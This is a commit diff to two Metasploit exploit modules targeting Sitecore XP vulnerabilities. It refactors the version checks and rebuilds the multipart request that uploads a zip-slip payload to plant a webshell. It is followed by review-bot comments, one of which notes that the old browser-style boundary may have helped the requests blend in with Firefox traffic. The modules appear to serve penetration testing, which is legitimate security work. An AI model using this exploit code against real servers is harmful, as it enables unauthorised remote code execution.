
Commit 5ab864b

committed
Uses between? for version check, clearer webshell upload
1 parent 00bd707 commit 5ab864b

2 files changed

+14
-49
lines changed


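--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb
@@ -70,7 +70,7 @@ def check
 
 sitecore_version = get_version
 
-return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version <= Rex::Version.new('10.4') && sitecore_version >= Rex::Version.new('10.0.0')
+return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))
 
 Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
 end
@@ -307,57 +307,22 @@ def upload_zipslip
 
 zip_data = zip.pack
 
-boundary = Rex::Text.rand_text_alphanumeric(31).to_s
-
-data_post = "------geckoformboundary#{boundary}\r\n"
-data_post << "Content-Disposition: form-data; name=\"__CSRFTOKEN\"\r\n\r\n"
-data_post << "#{hidden_inputs.dig(0, '__CSRFTOKEN')}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n"
-data_post << "#{view_state['value']}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"__VIEWSTATE\"\r\n\r\n"
-data_post << "\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"Item\"\r\n\r\n"
-data_post << "#{hidden_inputs.dig(0, 'Item')}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"Language\"\r\n\r\n"
-data_post << "#{hidden_inputs.dig(0, 'Language')}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"Path\"\r\n\r\n"
-data_post << "#{hidden_inputs.dig(0, 'Path')}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"Unzip\"\r\n\r\n"
-data_post << "1\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"Overwrite\"\r\n\r\n"
-data_post << "#{hidden_inputs.dig(0, 'Overwrite')}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"#{file_param}\"; filename=\"#{fake_zip}\"\r\n"
-data_post << "Content-Type: application/zip\r\n\r\n"
-data_post << "#{zip_data}\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
-data_post << "Content-Disposition: form-data; name=\"#{new_file_input}\"; filename=\"\"\r\n"
-data_post << "Content-Type: application/octet-stream\r\n\r\n"
-data_post << "\r\n"
-data_post << "------geckoformboundary#{boundary}\r\n"
-
+vars_form_data = [
+{ 'name' => '__CSRFTOKEN', 'data' => hidden_inputs.dig(0, '__CSRFTOKEN') },
+{ 'name' => '__VIEWSTATE', 'data' => view_state['value'] },
+{ 'name' => 'Item', 'data' => hidden_inputs.dig(0, 'Item') },
+{ 'name' => 'Language', 'data' => hidden_inputs.dig(0, 'Language') },
+{ 'name' => 'Path', 'data' => hidden_inputs.dig(0, 'Path') },
+{ 'name' => 'Unzip', 'data' => '1' },
+{ 'name' => 'Overwrite', 'data' => hidden_inputs.dig(0, 'Overwrite') },
+{ 'name' => file_param, 'data' => zip_data, 'content_type' => 'application/zip', 'encoding' => 'binary', 'filename' => fake_zip },
+{ 'name' => new_file_input, 'data' => '', 'content_type' => 'application/octet-stream', 'filename' => '' }
+]
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri('sitecore', 'shell', 'Applications', 'Dialogs', 'Upload', 'Upload2.aspx'),
 'vars_get' => { 'hdl' => 'sc_ct_trk' },
-'data' => data_post,
-'ctype' => "multipart/form-data; boundary=----geckoformboundary#{boundary}"
+'vars_form_data' => vars_form_data
 })
 
 return false unless res&.code == 200 && res.body.include?('Done')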
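Review bot: The new `vars_form_data` list passes `hidden_inputs.dig(0, '__CSRFTOKEN')`, `Item`, `Language`, `Path` and `Overwrite` through unchecked, so when the earlier form parse did not find a field the upload is still sent with a nil value and the only symptom is the later `Done` check failing with no hint of why. The old string-building code had the same gap, but with the fields now in a literal list it is cheap to fail fast before the request: `return false if %w[__CSRFTOKEN Item Language Path Overwrite].any? { |k| hidden_inputs.dig(0, k).nil? }`, ideally with a `vprint_error` naming the missing field. How Rex serialises a nil `data` value (empty part, `to_s`, or an exception) is not visible from this hunk and is worth confirming against the helper. Note also that the browser-style `------geckoformboundary` boundary is gone in favour of whatever Rex generates; if that prefix was chosen to blend in with Firefox traffic, the module's requests now look different on the wire. The body of upload_zipslip begins before this hunk.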

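--- a/modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb
+++ b/modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb
@@ -77,7 +77,7 @@ def check
 
 return Exploit::CheckCode::Safe('PowerShell extension not detected, might not be installed in target Sitecore instance') unless res&.code == 200
 
-return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version <= Rex::Version.new('10.4') && sitecore_version >= Rex::Version.new('10.0.0')
+return Exploit::CheckCode::Vulnerable("Sitecore version detected #{sitecore_version}, which is vulnerable") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))
 
 Exploit::CheckCode::Safe("Detected Sitecore version #{sitecore_version}, which is not vulnerable")
 end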
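Review bot: A pure version match is reported as `CheckCode::Vulnerable`, whereas Metasploit convention reserves `Vulnerable` for checks that actually confirm the flaw and uses `Appears` for version-based detection; `return Exploit::CheckCode::Appears("Sitecore version #{sitecore_version} is in the affected range") if sitecore_version.between?(Rex::Version.new('10.0.0'), Rex::Version.new('10.4'))` would be the honest result, especially if a hotfixed install can still report an in-range version. `between?` is inclusive at both ends, so 10.4 itself is flagged while anything above 10.4 falls through to Safe; a one-line comment such as `# Affected range per advisory: 10.0.0 through 10.4 inclusive` would make that boundary clearly intentional. `sitecore_version` is assigned before this hunk, so if it can be nil when detection fails the `between?` call raises NoMethodError instead of yielding `CheckCode::Unknown`; a guard like `return Exploit::CheckCode::Unknown('Could not determine Sitecore version') if sitecore_version.nil?` ahead of the range check would cover that. The enclosing check method starts outside the hunk.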
